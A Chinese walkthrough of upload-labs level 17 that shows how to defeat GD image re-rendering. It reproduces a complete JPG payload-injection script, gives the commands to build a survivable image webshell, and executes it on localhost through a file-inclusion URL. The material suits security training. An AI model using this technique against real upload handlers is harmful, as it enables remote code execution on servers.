upload-labs通关笔记-第17关文件上传关卡之二次渲染jpg格式
目录
一、二次渲染
二、代码审计
三、脚本法渗透
1、构造PHP脚本
2、执行PHP脚本
3、上传图片马
4、获取图片马地址
5、利用文件包含访问图片马
6、特别技巧提示成功概率
本文通过《upload-labs通关笔记-第17关二次渲染之jpg格式图片》系列,制作jpg图片马来绕过二次渲染进行渗透实战。二次渲染可以使用服务器端图像处理库重新生成新的图片文件,能消除文件中可能隐藏的恶意代码,可以防范文件上传安全风险。
一、二次渲染
文件上传的二次渲染是一种高级的文件上传风险防御技术,其核心原理是通过服务器端图像处理库(如GD库)对用户上传的图片文件进行重新解析和生成,彻底消除原始文件中可能隐藏的恶意代码。这种技术相比简单的文件头校验或重命名更为安全,因为它从根本上重构了文件内容,从而有效防范了图片马、webshell等常见文件上传攻击手段。
二次渲染是一种有效的防御技术,其核心思想是。
-
接收上传的文件
-
使用服务器端图像处理库重新生成文件
-
只保存新生成的文件,丢弃原始上传文件
二次渲染的安全性优势如下所示。
-
消除恶意代码:
-
图像处理库会丢弃所有非图像数据
-
无法保留隐藏在文件中的PHP代码或其他恶意内容
-
-
破坏特殊构造:
-
攻击者精心构造的畸形文件会被标准化
-
利用图像解析器进行文件上传绕过的可能性大大降低
-
二、代码审计
进入upload-labs靶场的第17关二次渲染关卡,查看源码分析其功能。这段代码实现了一个图片上传并通过imagecreatefromjpeg/png/gif等函数进行二次渲染的功能。它会检查上传文件的扩展名和 MIME 类型,只允许上传 JPEG、PNG 和 GIF 格式的图片。对于符合要求的图片,会将其移动到指定的目标路径,然后使用 PHP 的 GD 库对图片进行二次渲染,这个过程中所有非图像数据(如可能隐藏在文件中的PHP代码、恶意脚本等)都会被自动丢弃生成新的图片文件,、最后系统只保存服务器重新生成的"干净"图片文件并删除用户原始上传文件。在整个过程中,会根据不同的情况给出相应的提示信息。本关卡只针对jpg类型的图片进行二次渲染绕过,故而对jpg格式的源码进行详细注释,具体如下所示。
// 判断文件后缀是否为jpg且MIME类型为image/jpeg(双重验证)
if(($fileext == "jpg") && ($filetype=="image/jpeg")){// 将上传的临时文件移动到目标路径(安全函数,会验证是否为合法上传文件)if(move_uploaded_file($tmpname, $target_path)){/*** 关键安全步骤:二次渲染* 使用GD库从上传的JPG文件创建图像资源* 如果文件不是真正的JPG图片,这里会返回false*/$im = imagecreatefromjpeg($target_path);// 检查图像资源创建是否失败if($im == false){$msg = "该文件不是jpg格式的图片!"; // 设置错误消息@unlink($target_path); // 静默删除无效文件(@抑制错误输出)} else {/*** 安全命名策略:* 1. 使用时间作为随机数种子* 2. 生成随机数作为文件名* 3. 强制添加.jpg扩展名* 防止文件名预测和冲突*/srand(time()); // 初始化随机数生成器$newfilename = strval(rand()).".jpg"; // 生成随机文件名// 构建新文件的完整存储路径$img_path = UPLOAD_PATH.'/'.$newfilename;/*** 关键安全步骤:重新生成图像* 将图像资源保存为新的JPG文件* 这个过程会丢弃所有非图像数据,消除潜在恶意代码*/imagejpeg($im, $img_path);// 安全清理:删除原始上传文件(只保留二次渲染后的文件)@unlink($target_path);// 标记上传成功状态$is_upload = true;}} else {// 文件移动失败时的错误处理$msg = "上传出错!";}
}通过代码审计可知本关卡采用文件后缀、MIME法且通过imagecreatefromjpeg函数进行二次渲染处理,具体分析如下。
(1)双重验证
- 检查文件扩展名(匹配.jpg)
- 验证MIME类型(匹配image/jpeg)
(2)二次渲染
- 使用imagecreatefromjpeg()和imagejpeg()对图像进行二次处理
- 这种方法能有效消除jpg文件中可能隐藏的恶意代码
- 生成全新的图像文件,不保留原始文件的元数据
(3)随机文件名
- 使用time()和rand()生成不易被猜测的随机文件名
- 防止文件名冲突和预测攻击
三、脚本法渗透
1、构造PHP脚本
使用如下Sergey Bobrov的代码,通过miniPayload参数向图像文件中注入PHP代码,尝试保证注入的数据在经过 PHP 的imagecopyresized() 和 imagecopyresampled()函数处理后仍然保持不变。本关卡构造的php脚本如下所示。
<? phpinfo();?>接下来对miniPayload 赋值,具体如下所示。
$miniPayload = "<? phpinfo();?>"将如下脚本命名为jpg_info.php,具体效果如下所示。代码的功能是向 JPG 图像中植入 PHP 代码(如<? phpinfo();?>),使得图像文件在表面上仍为正常的 JPG 格式,且经过 PHP 的 GD 库图像处理函数处理后,注入的代码依然有效。这是一种典型的 "图像马" 生成技术。
<?php/*此代码实现了将有效负载注入 JPG 图像的算法,注入的数据在经过 PHP 函数 imagecopyresized() 和 imagecopyresampled() 处理后保持不变。前提条件是初始图像和处理后图像的大小和质量相同。操作步骤:1) 通过安全的文件上传脚本上传任意图像。2) 保存处理后的图像并运行:jpg_payload.php <jpg_name.jpg>相关参考:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/*/// 定义要注入的最小有效负载,这里是一个简单的 PHP 代码,用于输出 PHP 信息$miniPayload = "<? phpinfo();?>";if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {die('php-gd is not installed');}if(!isset($argv[1])) {die('php jpg_payload.php <jpg_name.jpg>');}set_error_handler("custom_error_handler");for($pad = 0; $pad < 1024; $pad++) {$nullbytePayloadSize = $pad;$dis = new DataInputStream($argv[1]);$outStream = file_get_contents($argv[1]);$extraBytes = 0;$correctImage = TRUE;if($dis->readShort() != 0xFFD8) {die('Incorrect SOI marker');}while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {$marker = $dis->readByte();$size = $dis->readShort() - 2;$dis->skip($size);if($marker === 0xDA) {$startPos = $dis->seek();$outStreamTmp = substr($outStream, 0, $startPos) . $miniPayload . str_repeat("\0",$nullbytePayloadSize) . substr($outStream, $startPos);checkImage('_'.$argv[1], $outStreamTmp, TRUE);if($extraBytes !== 0) {while((!$dis->eof())) {if($dis->readByte() === 0xFF) {if($dis->readByte !== 0x00) {break;}}}$stopPos = $dis->seek() - 2;$imageStreamSize = $stopPos - $startPos;$outStream = substr($outStream, 0, $startPos) . $miniPayload . substr(str_repeat("\0",$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize+$imageStreamSize-$extraBytes) . substr($outStream, $stopPos);} elseif($correctImage) {$outStream = $outStreamTmp;} else {break;}if(checkImage('payload_'.$argv[1], $outStream)) {die('Success!');} else {break;}}}}unlink('payload_'.$argv[1]);die('Something\'s wrong');function checkImage($filename, $data, $unlink = FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage = TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage = FALSE;if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {if(isset($m[1])) {$extraBytes = (int)$m[1];}}}class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order = false, $fromString = false) {$this->binData = '';$this->order = $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die('File not exists ['.$filename.']');$this->binData = file_get_contents($filename);} else {$this->binData = $filename;}$this->size = strlen($this->binData);}public function seek() {return ($this->size - strlen($this->binData));}public function skip($skip) {$this->binData = substr($this->binData, $skip);}public function readByte() {if($this->eof()) {die('End Of File');}$byte = substr($this->binData, 0, 1);$this->binData = substr($this->binData, 1);return ord($byte);}public function readShort() {if(strlen($this->binData) < 2) {die('End Of File');}$short = substr($this->binData, 0, 2);$this->binData = substr($this->binData, 2);if($this->order) {$short = (ord($short[1]) << 8) + ord($short[0]);} else {$short = (ord($short[0]) << 8) + ord($short[1]);}return $short;}public function eof() {return !$this->binData||(strlen($this->binData) === 0);}}
?>
2、执行PHP脚本
准备好脚本jpg_info.php,图片ljn.jpg,如下所示。
以我的电脑使用小皮phpstudy为例,php为小皮集成,这里选择php5.5的版本,PHP安装位置为
C:\phpstudy_pro\Extensions\php\php5.5.9nts,在命令行进入到当前目录,执行如下命令生成图片马payload_ljn.jpg。
C:\phpstudy_pro\Extensions\php\php5.5.9nts\php.exe jpg_info.php ljn.jpg
3、上传图片马
上传图片马payload_ljn.jpg并获取图片的地址,如下所示。
4、获取图片马地址
图片的url地址如下所示,这个图片是二次渲染后。
http://127.0.0.1/upload-labs/upload/12293.jpg下载该图片,使用16进制编辑器查看图片内容,对比渲染前后的图片,发现二次渲染后的图片依旧包含代码,并未被渲染掉。
5、利用文件包含访问图片马
构造通过文件包含访问恶意URL,具体如下所示。
http://127.0.0.1/upload-labs/include.php?file=upload/12293.jpg访问脚本,鼠标滚轮向下滑获取到php版本信息,具体如下所示。
6、特别技巧提示成功概率
这个生成图片马的脚本经常失败, 原作者提到过由于使用了最直接的注入方法,可能出现“第二次处理后,注入的数据可能会部分损坏”的问题,如果出现这些问题,尝试更改有效负载(例如在开头添加一些符号)或尝试使用其他初始图像。
我在复现问题时,出现过失败,我的解决方法是对mini_payload的尾部增加一些空格,比如原本获取php信息的脚本如下所示。
<? phpinfo();?>我会在脚本的尾部增加几个空格,提高生成图片马二次渲染后仍保留脚本的成功率,如下所示。
$miniPayload = "<? phpinfo();?> "经过修改后,制作的图片马成功概率大大提升。 同时,原始图片不要过于复杂,可以使用python生成,具体脚本如下所示。
from PIL import Image, ImageDraw, ImageFontdef add_text_to_image(text):# 创建一个 256x256 的白色背景图像img = Image.new('RGB', (256, 256), (255, 255, 255))# 创建一个绘图对象draw = ImageDraw.Draw(img)try:# 尝试使用系统默认字体,这里使用 Arial 字体,字号为 36font = ImageFont.truetype("arial.ttf", 36)except OSError:# 如果 Arial 字体不可用,使用系统默认字体font = ImageFont.load_default()# 使用 textbbox 方法获取文本的边界框left, top, right, bottom = draw.textbbox((0, 0), text, font=font)# 计算文本的宽度和高度text_width = right - lefttext_height = bottom - top# 计算文本居中的 x 坐标x = (img.width - text_width) // 2# 计算文本居中的 y 坐标y = (img.height - text_height) // 2# 在图像上绘制文本,文本颜色为紫色draw.text((x, y), text, fill=(255, 0, 255), font=font)# 显示图像img.show()# 保存图像为 ljn.jpgimg.save('ljn.jpg')# 调用函数并传入要添加的文本text = "mooyuan!" # 要写入的文字
add_text_to_image(text)